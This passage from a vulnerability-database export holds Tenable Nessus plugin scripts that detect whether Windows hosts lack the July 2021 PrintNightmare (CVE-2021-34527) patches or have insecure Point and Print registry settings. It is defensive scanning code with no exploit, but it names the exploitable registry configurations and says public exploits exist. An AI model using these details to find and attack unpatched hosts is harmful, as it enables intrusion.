script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004959: Windows Server 2008 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004959\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004959\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004959'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004959])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges. The remote system is not fully secure as the point and print registry settings contain an insecure configuration in one of the following locations/keys:\n\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\NoWarningNoElevationOnInstall\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\UpdatePromptSettings", "cvss3": {}, "published": "2021-07-09T00:00:00", "type": "nessus", "title": "Windows PrintNightmare Registry Exposure CVE-2021-34527 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-02-27T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/151488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151488);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/27\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004945\");\n script_xref(name:\"MSKB\", value:\"5004946\");\n script_xref(name:\"MSKB\", value:\"5004947\");\n script_xref(name:\"MSKB\", value:\"5004948\");\n script_xref(name:\"MSKB\", value:\"5004950\");\n script_xref(name:\"MSKB\", value:\"5004951\");\n script_xref(name:\"MSKB\", value:\"5004953\");\n script_xref(name:\"MSKB\", value:\"5004954\");\n script_xref(name:\"MSKB\", value:\"5004955\");\n script_xref(name:\"MSKB\", value:\"5004956\");\n script_xref(name:\"MSKB\", value:\"5004958\");\n script_xref(name:\"MSKB\", value:\"5004959\");\n script_xref(name:\"MSKB\", value:\"5004960\");\n script_xref(name:\"MSFT\", value:\"MS21-5004945\");\n script_xref(name:\"MSFT\", value:\"MS21-5004946\");\n script_xref(name:\"MSFT\", value:\"MS21-5004947\");\n script_xref(name:\"MSFT\", value:\"MS21-5004948\");\n script_xref(name:\"MSFT\", value:\"MS21-5004950\");\n script_xref(name:\"MSFT\", value:\"MS21-5004951\");\n script_xref(name:\"MSFT\", value:\"MS21-5004953\");\n script_xref(name:\"MSFT\", value:\"MS21-5004954\");\n script_xref(name:\"MSFT\", value:\"MS21-5004955\");\n script_xref(name:\"MSFT\", value:\"MS21-5004956\");\n script_xref(name:\"MSFT\", value:\"MS21-5004958\");\n script_xref(name:\"MSFT\", value:\"MS21-5004959\");\n script_xref(name:\"MSFT\", value:\"MS21-5004960\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"Windows PrintNightmare Registry Exposure CVE-2021-34527 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \n operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges. \n \n The remote system is not fully secure as the point and print registry settings contain an insecure configuration in \n one of the following locations/keys:\n\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\NoWarningNoElevationOnInstall\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\UpdatePromptSettings\");\n # https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c80300b5\");\n # https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.Printing::PointAndPrint_Restrictions_Win7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2cdd3bd3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004948\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004951\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004953\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004956\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004958\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004959\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004960\");\n script_set_attribute(attribute:\"solution\", value:\n\"See Vendor Advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-07';\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar my_os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\nvar my_os_build = get_kb_item('SMB/WindowsVersionBuild');\nvar mitigated = TRUE; # by default: These registry keys do not exist by default, and therefore are already at the secure setting\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif(my_os == '10')\n{\n if( \n (my_os_build != '10240') && \n (my_os_build != '14393') && \n (my_os_build != '17763') && \n (my_os_build != '18363') && \n (my_os_build != '19041') && \n (my_os_build != '19042') && \n (my_os_build != '19043') \n ) exit(0, 'Windows version ' + my_os + ', build ' + my_os_build + ' is not affected.');\n}\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n## Check mitigation\nvar keys = make_list(\n 'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\NoWarningNoElevationOnInstall',\n 'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\UpdatePromptSettings');\n\nhotfix_check_fversion_init();\nregistry_init();\nvar hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nvar values = get_registry_values(handle:hklm, items:keys);\nRegCloseKey(handle:hklm);\n\nvar report = '\\n Nessus detected the following insecure registry key configuration:\\n';\n# MS: must confirm that the following registry settings are set to 0 (zero) or are not defined\n# if defined and empty we are exposed; so isNull over empty_or_null()\n# setup reporting\nforeach var key (keys)\n{\n if(!isnull(values[key]) && (values[key] != 0) )\n {\n report += ' - ' + key + ' is set to ' + values[key] + '\\n';\n mitigated = FALSE;\n }\n}\nhotfix_add_report(report);\n\n# if we don't have any patches or the registry is insecurely configured, alert.\nif(!mitigated)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:21", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004948: Windows 10 1607 and Windows Server 2016 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004948.NASL", "href": "https://www.tenable.com/plugins/nessus/151474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151474);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004948\");\n script_xref(name:\"MSFT\", value:\"MS21-5004948\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004948: Windows 10 1607 and Windows Server 2016 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004948\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004948\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004948'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'14393',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004948])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:32", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004951: Windows 7 and Windows Server 2008 R2 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004951.NASL", "href": "https://www.tenable.com/plugins/nessus/151476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151476);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004951\");\n script_xref(name:\"MSKB\", value:\"5004953\");\n script_xref(name:\"MSFT\", value:\"MS21-5004951\");\n script_xref(name:\"MSFT\", value:\"MS21-5004953\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004951: Windows 7 and Windows Server 2008 R2 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004951\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004951\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004951'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004951])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004960: Windows Server 2012 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004960.NASL", "href": "https://www.tenable.com/plugins/nessus/151479", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151479);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004960\");\n script_xref(name:\"MSFT\", value:\"MS21-5004960\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004960: Windows Server 2012 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004960\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004960\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004960'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004960])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in 